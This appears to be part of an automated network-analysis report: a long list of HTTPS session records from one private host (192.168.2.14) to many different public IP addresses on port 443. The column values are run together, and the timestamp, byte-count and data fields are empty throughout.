                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17653192.168.2.1444154140.224.42.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17654192.168.2.145316831.230.192.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17655192.168.2.1457116113.192.13.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17656192.168.2.145232250.9.187.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17657192.168.2.145348634.41.252.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17658192.168.2.1448102131.68.38.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17659192.168.2.144585898.9.245.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17660192.168.2.145228293.122.122.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17661192.168.2.1435580144.130.107.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17662192.168.2.143659018.39.85.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17663192.168.2.144971088.13.143.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17664192.168.2.144095042.243.168.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17665192.168.2.144897480.28.69.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17666192.168.2.1444912219.161.15.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17667192.168.2.14513704.139.9.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17668192.168.2.1436780150.74.155.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17669192.168.2.1436276172.147.49.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17670192.168.2.144105220.190.180.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17671192.168.2.144504491.209.60.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17672192.168.2.14485581.50.18.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17673192.168.2.145309275.117.42.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17674192.168.2.1437690134.145.0.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17675192.168.2.1443796190.6.33.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17676192.168.2.1457630110.238.129.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17677192.168.2.14557161.16.207.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17678192.168.2.144219263.98.66.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17679192.168.2.1438360135.103.81.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17680192.168.2.143535845.126.151.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17681192.168.2.144887696.123.10.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17682192.168.2.1437978144.118.52.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17683192.168.2.1440810175.17.218.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17684192.168.2.1457768108.195.168.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17685192.168.2.1432834117.97.30.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17686192.168.2.1449814146.187.236.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17687192.168.2.1434326197.149.220.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17688192.168.2.143429896.250.132.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17689192.168.2.1440106182.69.223.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17690192.168.2.145161251.176.13.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17691192.168.2.1459286126.16.208.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17692192.168.2.1443662113.242.2.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17693192.168.2.144663220.120.125.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17694192.168.2.1445070129.40.34.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17695192.168.2.144190086.139.137.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17696192.168.2.1434624174.74.79.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17697192.168.2.1453364188.78.185.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17698192.168.2.144174475.213.55.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17699192.168.2.1445784146.17.126.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17700192.168.2.1438348173.70.173.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17701192.168.2.143686877.146.206.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17702192.168.2.145086446.45.239.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17703192.168.2.1443342193.61.139.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17704192.168.2.1436806123.134.68.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17705192.168.2.144784480.212.122.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17706192.168.2.144181818.98.123.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17707192.168.2.144588227.192.30.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17708192.168.2.144856620.146.149.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17709192.168.2.1460796196.255.252.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17710192.168.2.144126053.95.136.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17711192.168.2.145434683.142.94.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17712192.168.2.1453936170.221.97.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17713192.168.2.1456836211.131.54.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17714192.168.2.1443286109.199.55.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17715192.168.2.145184277.230.161.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17716192.168.2.143912842.89.35.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17717192.168.2.1453718201.221.135.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17718192.168.2.144009091.142.5.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17719192.168.2.1453350151.130.16.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17720192.168.2.143779840.0.124.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17721192.168.2.1460542148.185.217.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17722192.168.2.1458422210.209.240.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17723192.168.2.145573073.84.156.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17724192.168.2.1448316161.47.193.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17725192.168.2.145858469.209.243.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17726192.168.2.1460602222.180.141.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17727192.168.2.1459224189.141.202.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17728192.168.2.1438444156.128.252.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17729192.168.2.1459732186.243.185.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17730192.168.2.1441572166.104.185.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17731192.168.2.1433484212.21.78.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17732192.168.2.1444630187.252.226.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17733192.168.2.145865827.60.166.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17734192.168.2.143570293.255.140.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17735192.168.2.143869649.83.67.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17736192.168.2.1447544105.66.234.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17737192.168.2.1437496177.234.172.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17738192.168.2.1447812180.64.162.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17739192.168.2.145973081.208.61.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17740192.168.2.1454330216.155.236.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17741192.168.2.1442958171.250.35.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17742192.168.2.144644866.46.96.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17743192.168.2.1454144168.151.40.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17744192.168.2.1437362220.230.47.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17745192.168.2.143950057.217.224.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17746192.168.2.145755650.235.162.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17747192.168.2.14330809.148.8.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17748192.168.2.1442648194.99.235.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17749192.168.2.144585035.0.168.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17750192.168.2.1442608186.222.18.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17751192.168.2.1447898123.251.56.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17752192.168.2.144072249.141.131.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17753192.168.2.1450430160.45.46.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17754192.168.2.1441816207.32.105.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17755192.168.2.144682023.78.148.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17756192.168.2.144717839.26.235.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17757192.168.2.1436522196.150.125.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17758192.168.2.1452072134.251.41.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17759192.168.2.1458670123.191.28.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17760192.168.2.145765846.216.87.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17761192.168.2.1458118151.82.188.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17762192.168.2.144568896.233.82.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17763192.168.2.143708013.47.203.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17764192.168.2.1454416203.67.116.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17765192.168.2.145131834.180.213.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17766192.168.2.1458272130.179.23.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17767192.168.2.1456808154.98.212.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17768192.168.2.1453612211.251.95.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17769192.168.2.1454624167.35.17.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17770192.168.2.143409038.189.122.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17771192.168.2.143501494.170.61.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17772192.168.2.144983623.214.71.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17773192.168.2.1447178218.197.48.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17774192.168.2.146054489.125.179.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17775192.168.2.1452052108.196.126.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17776192.168.2.1443462200.167.231.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17777192.168.2.1436182122.197.94.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17778192.168.2.1433106199.90.108.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17779192.168.2.144171047.164.194.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17780192.168.2.144820881.242.122.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17781192.168.2.1437732117.146.150.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17782192.168.2.145759081.118.170.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17783192.168.2.1450042146.109.210.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17784192.168.2.144926865.10.73.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17785192.168.2.145691887.6.29.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17786192.168.2.1437850112.125.109.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17787192.168.2.146009014.145.85.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17788192.168.2.144372243.4.148.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17789192.168.2.1435920181.101.169.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17790192.168.2.1440276211.195.219.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17791192.168.2.145679496.174.167.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17792192.168.2.1438050131.5.124.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17793192.168.2.1456272121.15.46.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17794192.168.2.144336661.12.182.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17795192.168.2.1433348129.125.110.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17796192.168.2.144822074.246.61.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17797192.168.2.1454566164.17.29.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17798192.168.2.1451088142.224.140.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17799192.168.2.1434346196.227.130.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17800192.168.2.14487104.164.92.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17801192.168.2.1441456104.45.50.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17802192.168.2.1441016192.245.209.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17803192.168.2.144798051.244.149.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17804192.168.2.143728091.15.46.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17805192.168.2.1437474212.251.35.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17806192.168.2.145664259.220.115.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17807192.168.2.144789261.33.171.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17808192.168.2.145861849.45.227.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17809192.168.2.143304682.49.213.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17810192.168.2.143931665.110.170.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17811192.168.2.1436996107.54.240.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17812192.168.2.145996670.91.78.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17813192.168.2.1450560101.1.209.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17814192.168.2.1442714132.205.76.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17815192.168.2.146097227.18.124.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17816192.168.2.144204640.186.224.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17817192.168.2.1451248155.143.162.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17818192.168.2.1449510220.22.41.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17819192.168.2.1455968126.162.252.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17820192.168.2.1448678207.51.90.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17821192.168.2.1437306110.124.161.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17822192.168.2.1449464169.4.212.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17823192.168.2.1440414202.2.247.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17824192.168.2.1434716158.105.169.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17825192.168.2.144336676.22.229.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17826192.168.2.144743861.86.86.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17827192.168.2.1447558117.216.227.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17828192.168.2.1440362217.154.8.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17829192.168.2.1435902181.105.110.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17830192.168.2.146069014.190.174.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17831192.168.2.1436506113.18.153.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17832192.168.2.1459924212.212.252.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17833192.168.2.1443944203.175.144.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17834192.168.2.143953036.232.9.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17835192.168.2.1452696146.81.126.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17836192.168.2.143530495.106.149.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17837192.168.2.143335032.182.177.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17838192.168.2.145226442.39.206.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17839192.168.2.144558691.242.111.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17840192.168.2.1453758140.3.154.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17841192.168.2.145582813.46.34.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17842192.168.2.144082820.234.205.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17843192.168.2.1454228178.171.36.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17844192.168.2.1437716146.7.194.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17845192.168.2.145203265.226.28.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17846192.168.2.1434016130.48.21.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17847192.168.2.1435102181.82.212.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17848192.168.2.144601081.50.104.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17849192.168.2.1433004221.53.158.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17850192.168.2.143745440.48.187.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17851192.168.2.1453686172.193.104.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17852192.168.2.1438060159.7.224.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17853192.168.2.1433124206.212.122.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17854192.168.2.1460462158.30.183.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17855192.168.2.145321824.94.96.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17856192.168.2.1446966217.145.107.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17857192.168.2.145448698.144.252.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17858192.168.2.1458626174.69.237.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17859192.168.2.1447032145.131.140.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17860192.168.2.1456824120.112.52.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17861192.168.2.146009668.169.200.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17862192.168.2.1439958173.154.213.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17863192.168.2.1447134196.32.210.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17864192.168.2.1457262219.183.177.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17865192.168.2.1448266110.235.139.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17866192.168.2.144735645.25.169.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17867192.168.2.144284277.220.245.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17868192.168.2.1457030124.39.229.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17869192.168.2.1442216118.222.42.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17870192.168.2.1446584216.181.198.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17871192.168.2.1442306151.32.65.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17872192.168.2.1458240184.189.116.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17873192.168.2.1460540194.119.138.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17874192.168.2.143506479.211.185.140443
                                      TimestampBytes transferredDirectionData


